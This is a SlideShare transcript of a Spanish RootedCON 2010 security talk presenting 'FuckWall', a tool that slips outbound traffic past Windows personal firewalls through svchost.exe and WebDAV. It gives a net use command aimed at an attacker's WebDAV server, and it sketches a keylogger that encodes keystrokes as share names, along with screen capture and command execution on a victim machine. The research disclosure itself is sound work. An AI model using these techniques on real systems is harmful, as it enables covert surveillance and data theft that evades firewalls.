Antonio López & Javier Medina - FuckWALL - Bypassing firewalls [RootedCON 2010]
Upcoming SlideShare
Loading in...5
×
 

Antonio López & Javier Medina - FuckWALL - Bypassing firewalls [RootedCON 2010]

on

  • 4,371 views

En esta conferencia se mostrarán debilidades de diseño existentes en numerosos firewalls personales, tanto gratuitos, como comerciales. Estas debilidades de diseño son la existencia de procesos de ...

En esta conferencia se mostrarán debilidades de diseño existentes en numerosos firewalls personales, tanto gratuitos, como comerciales. Estas debilidades de diseño son la existencia de procesos de sistema, privilegiados y no filtrados por estos firewalls.

El objetivo final de la conferencia es realizar una demostración de la herramienta FuckWALL y de los conceptos en los que esta se apoya para sobrepasar los firewalls personales en sistemas Microsoft Windows.

Statistics

Views

Total Views
4,371
Views on SlideShare
4,138
Embed Views
233

Actions

Likes
1
Downloads
202
Comments
0

5 Embeds 233

http://www.dragonjar.org 217
http://www.slideshare.net 13
http://web.latinmail.com 1
http://feeds.feedburner.com 1
http://static.slidesharecdn.com 1

Accessibility

Categories

Upload Details

Uploaded via as Adobe PDF

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

Antonio López & Javier Medina - FuckWALL - Bypassing firewalls [RootedCON 2010] Antonio López & Javier Medina - FuckWALL - Bypassing firewalls [RootedCON 2010] Presentation Transcript

  • FuckWall A Windows Firewalls Bypassing Tool  Congreso de Seguridad ~ Rooted CON’2010
  • ¿Quiénes no sómos? Investigadores buscando fallos en el protocolo DNS Congreso de Seguridad ~ Rooted CON’2010 2
  • ¿Quiénes no sómos? Hackers que vieron la luz al final del tunel y encontraron vida más allá de las consultoras... Congreso de Seguridad ~ Rooted CON’2010 3 View slide
  • ¿Quiénes no sómos? Cálico Electrónico Congreso de Seguridad ~ Rooted CON’2010 4 View slide
  • ¿Quiénes podríamos ser? M&M’s HackStory: Kernelpanik o Kpk fue un grupo de hackers nacido aproximadamente en el año 2000, según se desprende de la fecha de copyright de su web, aún activa. Las últimas noticias de Kernelpanik son de 2007, año en que se supone dejó de existir. Congreso de Seguridad ~ Rooted CON’2010 5
  • ¿De qué vamos a hablar? -  Orígenes -  La idea aka. “El concepto es el concepto” -  PoC aka. “¿Esto realmente funciona?” -  FuckWall aka. “La herramienta” -  Demostración FuckWall aka. “Pa’habernos matao” Congreso de Seguridad ~ Rooted CON’2010 6
  • FuckWall: Los orígenes (I) •  Once upon a time ... –  Éramos jóvenes, cometíamos errores y programábamos por dinero ... –  Pero aprendimos de nuestros errores ... Win32/Bypass: Anulando la detección de ficheros ( 2007 ) – Centrado en el bypassing de antivirus – Rudimentario técnicamente pero “ocurrente” Congreso de Seguridad ~ Rooted CON’2010 7
  • FuckWall: Los orígenes (II) •  El presente: – Agosto de 2009: ¿Por qué no hacer lo mismo con los firewalls? – FuckWall: A Windows firewalls bypassing tool – Centrado en la evasión de los firewalls  Enviar tráfico de SALIDA sin control por parte del FW personal. – Apoyado en una debilidad de diseño – Desarrollo de una herramienta automatizada Congreso de Seguridad ~ Rooted CON’2010 8
  • FuckWall: Fundamento funcional •  Usabilidad vs. Seguridad •  Procesos “privilegiados” en firewalls –  Por razones de “usabilidad”/”funcionalidad” numerosas compañías firewalls deciden “arbitrariamente” permitir libremente la comunicación de tráfico de salida a determinados procesos. Congreso de Seguridad ~ Rooted CON’2010 9
  • FuckWall: Fundamento funcional •  OutPost: Congreso de Seguridad ~ Rooted CON’2010 1 0
  • FuckWall: Fundamento funcional •  Zone Alarm: Congreso de Seguridad ~ Rooted CON’2010 1 1
  • FuckWall: Fundamento funcional Y así hasta 8 firewalls personales más ... Se libró ( si la memoria no nos falla ): Jetico Congreso de Seguridad ~ Rooted CON’2010 1 2
  • FuckWall: La idea •  Una vieja idea: – ¿Qué sucedería si desde el espacio de usuario pudiesemos controlar uno de esos procesos “privilegiados” por los firewalls? •  Se ha realizado anteriormente: – Hooking a una aplicación “privilegiada” – Más usual: hooking del navegador www.securitybydefault.com/2009/09/troyanos-titiriteros.html Congreso de Seguridad ~ Rooted CON’2010 1 3
  • FuckWall: Revisando la idea •  Los problemas del hooking: – Técnica “relativamente” difundida e invasiva. – Los antivirus y los firewalls detectan intentos de hooking sobre aplicaciones, alertando al usuario de contenido vírico y/o peligroso. •  La idea revisada: – ¿Y si fuese posible desde el espacio de usuario interactuar directamente con un proceso privilegiado sin usar hooking? Congreso de Seguridad ~ Rooted CON’2010 1 4
  • FuckWall: Construyendo la idea (I) •  El proceso SVCHOST.EXE – ¿Qué es el proceso SVCHOST.EXE? A grosso modo es la “idea” de Microsoft para ejecutar cualquier servicio que esté contenido en un DLL Congreso de Seguridad ~ Rooted CON’2010 1 5
  • FuckWall: Construyendo la idea (I) •  El proceso SVCHOST.EXE – ¿Para qué se usa SVCHOST.EXE? •  DNS •  uPNP •  Tráfico ICMP •  Web Folders •  Y un largo etc ... Congreso de Seguridad ~ Rooted CON’2010 1 6
  • FuckWall: Construyendo la idea (II) •  La gran pregunta: ¿Es posible manipular svchost.exe desde espacio de usuario y sin necesidad de ningún tipo de privilegio especial generando tráfico de salida dirigido? Congreso de Seguridad ~ Rooted CON’2010 1 7
  • FuckWall: Construyendo la idea (III) - A nosotros se nos ocurre: La tecnología de Microsoft Windows denominada “carpetas web” / “web folders” hace uso de svchost.exe para su comunicación » No requiere privilegios » Permite comunicación WebDAV Congreso de Seguridad ~ Rooted CON’2010 1 8
  • FuckWALL: Proof of Concept •  ¿Qué hace falta para evadir el control de tráfico saliente en aproximadamente el 90% de los firewalls personales de windows? –  Un servidor Apache con el módulo de WebDAV habilitado para compartir un recurso. –  Escribir desde el equipo del que queramos bypassear su firewal: net use Z: http://servidordav/recurso Congreso de Seguridad ~ Rooted CON’2010 1 9
  • FuckWALL: Proof of Concept (II) DEMOSTRACIÓN I PoC Congreso de Seguridad ~ Rooted CON’2010 2 0
  • FuckWALL: La Herramienta (I) •  FuckWall es una herramienta cliente-servidor que se apoya en el concepto anteriormente mostrado de hacer uso de la comunicación WebDAV, implementada a través del proceso svchost.exe, para evadir las medidas de seguridad sobre el tráfico saliente impuestas por firewalls personales en entornos Microsoft Windows. Congreso de Seguridad ~ Rooted CON’2010 2 1
  • FuckWALL: La Herramienta (II) •  Funcionalidades: •  Captura de Teclado: Comunicación unidireccional hacia el servidor de las teclas pulsadas en la máquina cliente (víctima) •  Control Remoto: – Captura de pantalla: Comunicación bidireccional para envío al servidor de la pantalla capturada ante cada click del ratón en el equipo cliente (victima) – Ejecución de comandos: Comunicación bidireccional para la ejecución de comandos en la máquina cliente (víctima) y envío de resultados al servidor. Congreso de Seguridad ~ Rooted CON’2010 2 2
  • FuckWALL: Función Keylogger •  Cada pulsación de tecla genera en el cliente un intento por montar un recurso compartido equivalente a la tecla pulsada. •  El servidor rechaza _siempre_ este intento de montaje, registrando la pulsación y la aplicación en la que se ha ejecutado. Congreso de Seguridad ~ Rooted CON’2010 2 3
  • FuckWALL: Función Keylogger •  Cliente: –  Paso 1: SetWindowHookEx  Tecla pulsada. –  Paso 2: WNetAddConnection2  tecla.app.kpk •  Servidor (mod_rewrite): –  Paso 3: Rewriterule ^(.*).(.*).kpk$ logger.php?app= $1&key=$2  Registro –  Paso 4: header('HTTP/1.1 404 Not Found');  Error Congreso de Seguridad ~ Rooted CON’2010 2 4
  • FuckWALL: Proof of Concept (II) DEMOSTRACIÓN II FuckWall Captura de Teclado Congreso de Seguridad ~ Rooted CON’2010 2 5
  • FuckWALL: Función Control Remoto •  El cliente se conecta satisfactoriamente al recurso compartido por el servidor. •  El servidor para esta funcionalidad hace uso del módulo mod_dav. •  El cliente hará envíos de las capturas de pantalla ante cada click del usuario. •  El cliente se descarga del servidor la lista de comandos a ejecutar, los ejecuta y devuelve el resultado. Congreso de Seguridad ~ Rooted CON’2010 2 6
  • FuckWALL: Función Control Remoto •  Paso 1: WNetAddConnection2  Recurso Netbios SIN Unidad* •  Paso 2: SetWindowHookEx  Captura de Pantalla •  Paso 3: CreateFile  Copiar datos al Servidor Congreso de Seguridad ~ Rooted CON’2010 2 7
  • FuckWALL: Proof of Concept (II) DEMOSTRACIÓN III FuckWall Control Remoto Congreso de Seguridad ~ Rooted CON’2010 2 8
  • FuckWALL: Conclusiones •  Fácil evasión del firewall •  Minimos requerimientos técnicos •  Llamadas básicas al API •  Debilidad basada en la confianza en determinados procesos vitales del sistema. Congreso de Seguridad ~ Rooted CON’2010 2 9
  • ¡GRACIAS POR AGUANTAR EN LA SILLA! Autores ( en escricto orden de nacimiento ): Antonio López – alopmun@gmail.com Javier Medina – medina.fjavier@gmail.com Congreso de Seguridad ~ Rooted CON’2010